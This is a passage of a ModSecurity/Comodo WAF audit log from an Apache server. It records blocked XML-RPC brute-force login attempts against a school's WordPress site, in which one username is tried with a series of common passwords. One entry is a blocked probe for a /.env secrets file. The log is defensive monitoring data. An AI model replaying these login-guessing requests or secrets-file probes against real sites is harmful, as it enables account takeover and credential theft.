(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --547e3e62-Z-- --f063855a-A-- [19/Apr/2025:21:02:09 +0700] aAOs4XNa4dA2HllpK_N57gAAAJE 103.236.140.4 47082 103.236.140.4 8181 --f063855a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f063855a-C-- wp.getUsersBlogs wakahumas wakahumas --f063855a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f063855a-E-- --f063855a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071329086680 4730 (- - -) Stopwatch2: 1745071329086680 4730; combined=3326, p1=406, p2=2772, p3=0, p4=0, p5=88, sr=77, sw=60, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f063855a-Z-- --48c5446a-A-- [19/Apr/2025:21:03:11 +0700] aAOtH-vDiFC_ir7MDwbjYAAAAFg 103.236.140.4 47366 103.236.140.4 8181 --48c5446a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --48c5446a-C-- wp.getUsersBlogs wakahumas admin_lin --48c5446a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c5446a-E-- --48c5446a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071391889194 5476 (- - -) Stopwatch2: 1745071391889194 5476; combined=3937, p1=445, p2=3201, p3=0, p4=0, p5=188, sr=86, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c5446a-Z-- --9f205970-A-- [19/Apr/2025:21:04:13 +0700] aAOtXQ6cTFSgLAHl7PrV3AAAABE 103.236.140.4 47644 103.236.140.4 8181 --9f205970-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9f205970-C-- wp.getUsersBlogs wakahumas Admin123 --9f205970-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f205970-E-- --9f205970-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071453845767 5334 (- - -) Stopwatch2: 1745071453845767 5334; combined=3812, p1=462, p2=3172, p3=0, p4=0, p5=106, sr=87, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f205970-Z-- --f687fe75-A-- [19/Apr/2025:21:05:14 +0700] aAOtmuvDiFC_ir7MDwbjpQAAAEo 103.236.140.4 47940 103.236.140.4 8181 --f687fe75-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f687fe75-C-- wp.getUsersBlogs wakahumas wordPress15839Drop --f687fe75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f687fe75-E-- --f687fe75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071514639001 5508 (- - -) Stopwatch2: 1745071514639001 5508; combined=3965, p1=490, p2=3255, p3=0, p4=0, p5=125, sr=127, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f687fe75-Z-- --13a2583a-A-- [19/Apr/2025:21:06:18 +0700] aAOt2g6cTFSgLAHl7PrWAgAAABg 103.236.140.4 48264 103.236.140.4 8181 --13a2583a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --13a2583a-C-- wp.getUsersBlogs wakahumas 1111111 --13a2583a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13a2583a-E-- --13a2583a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071578274537 4964 (- - -) Stopwatch2: 1745071578274537 4964; combined=3864, p1=423, p2=3206, p3=0, p4=0, p5=137, sr=78, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13a2583a-Z-- --ec22c600-A-- [19/Apr/2025:21:07:26 +0700] aAOuHuvDiFC_ir7MDwbjuwAAAFA 103.236.140.4 48574 103.236.140.4 8181 --ec22c600-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ec22c600-C-- wp.getUsersBlogs wakahumas wakahumas1980 --ec22c600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec22c600-E-- --ec22c600-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071646312381 4967 (- - -) Stopwatch2: 1745071646312381 4967; combined=3824, p1=437, p2=3218, p3=0, p4=0, p5=100, sr=88, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec22c600-Z-- --f896c86f-A-- [19/Apr/2025:21:08:26 +0700] aAOuWg6cTFSgLAHl7PrWawAAABc 103.236.140.4 48914 103.236.140.4 8181 --f896c86f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f896c86f-C-- wp.getUsersBlogs wakahumas qazwsxedc --f896c86f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f896c86f-E-- --f896c86f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071706430054 4222 (- - -) Stopwatch2: 1745071706430054 4222; combined=3248, p1=371, p2=2701, p3=0, p4=0, p5=102, sr=97, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f896c86f-Z-- --22fc3c71-A-- [19/Apr/2025:21:09:31 +0700] aAOumw6cTFSgLAHl7PrWlQAAAAs 103.236.140.4 49224 103.236.140.4 8181 --22fc3c71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --22fc3c71-C-- wp.getUsersBlogs wakahumas shaggy --22fc3c71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22fc3c71-E-- --22fc3c71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071771611255 5366 (- - -) Stopwatch2: 1745071771611255 5366; combined=3909, p1=508, p2=3231, p3=0, p4=0, p5=100, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22fc3c71-Z-- --de488737-A-- [19/Apr/2025:21:10:33 +0700] aAOu2XNa4dA2HllpK_N6cQAAAJE 103.236.140.4 49496 103.236.140.4 8181 --de488737-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --de488737-C-- wp.getUsersBlogs wakahumas monkey1 --de488737-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de488737-E-- --de488737-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071833303590 5233 (- - -) Stopwatch2: 1745071833303590 5233; combined=4130, p1=496, p2=3462, p3=0, p4=0, p5=103, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de488737-Z-- --ca99af43-A-- [19/Apr/2025:21:11:07 +0700] aAOu-0ruoUXZj665VUH08AAAANI 103.236.140.4 49642 103.236.140.4 8181 --ca99af43-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.62.250 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.62.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ca99af43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca99af43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745071867865631 655 (- - -) Stopwatch2: 1745071867865631 655; combined=267, p1=233, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca99af43-Z-- --7c73b932-A-- [19/Apr/2025:21:11:35 +0700] aAOvF0ruoUXZj665VUH09wAAAMQ 103.236.140.4 49756 103.236.140.4 8181 --7c73b932-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7c73b932-C-- wp.getUsersBlogs wakahumas Marketing2023 --7c73b932-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c73b932-E-- --7c73b932-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071895564188 5183 (- - -) Stopwatch2: 1745071895564188 5183; combined=3684, p1=446, p2=3068, p3=0, p4=0, p5=100, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c73b932-Z-- --6fdafd16-A-- [19/Apr/2025:21:12:35 +0700] aAOvUw6cTFSgLAHl7PrW1wAAAAY 103.236.140.4 50068 103.236.140.4 8181 --6fdafd16-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fdafd16-C-- wp.getUsersBlogs wakahumas 212121 --6fdafd16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fdafd16-E-- --6fdafd16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745071955684190 4492 (- - -) Stopwatch2: 1745071955684190 4492; combined=3371, p1=388, p2=2708, p3=0, p4=0, p5=180, sr=82, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fdafd16-Z-- --04dbc72e-A-- [19/Apr/2025:21:13:38 +0700] aAOvkuvDiFC_ir7MDwbkbwAAAE8 103.236.140.4 51422 103.236.140.4 8181 --04dbc72e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --04dbc72e-C-- wp.getUsersBlogs wakahumas liverpool1 --04dbc72e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04dbc72e-E-- --04dbc72e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072018743807 4952 (- - -) Stopwatch2: 1745072018743807 4952; combined=3659, p1=443, p2=3007, p3=0, p4=0, p5=119, sr=83, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04dbc72e-Z-- --738c2537-A-- [19/Apr/2025:21:14:41 +0700] aAOv0Q6cTFSgLAHl7PrX1AAAABc 103.236.140.4 54250 103.236.140.4 8181 --738c2537-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --738c2537-C-- wp.getUsersBlogs wakahumas dancer --738c2537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --738c2537-E-- --738c2537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072081089971 16997 (- - -) Stopwatch2: 1745072081089971 16997; combined=27406, p1=515, p2=3070, p3=0, p4=0, p5=11924, sr=154, sw=72, l=0, gc=11825 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --738c2537-Z-- --d22a7526-A-- [19/Apr/2025:21:15:41 +0700] aAOwDUruoUXZj665VUH2pgAAANU 103.236.140.4 56536 103.236.140.4 8181 --d22a7526-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d22a7526-C-- wp.getUsersBlogs wakahumas marketing2021 --d22a7526-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d22a7526-E-- --d22a7526-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072141673374 4836 (- - -) Stopwatch2: 1745072141673374 4836; combined=3786, p1=430, p2=3187, p3=0, p4=0, p5=100, sr=87, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d22a7526-Z-- --5362115a-A-- [19/Apr/2025:21:16:41 +0700] aAOwSUruoUXZj665VUH36AAAANE 103.236.140.4 59528 103.236.140.4 8181 --5362115a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5362115a-C-- wp.getUsersBlogs wakahumas smkn22-jkt_sch_id --5362115a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5362115a-E-- --5362115a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745072201702478 4583 (- - -) Stopwatch2: 1745072201702478 4583; combined=3190, p1=401, p2=2649, p3=0, p4=0, p5=83, sr=82, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 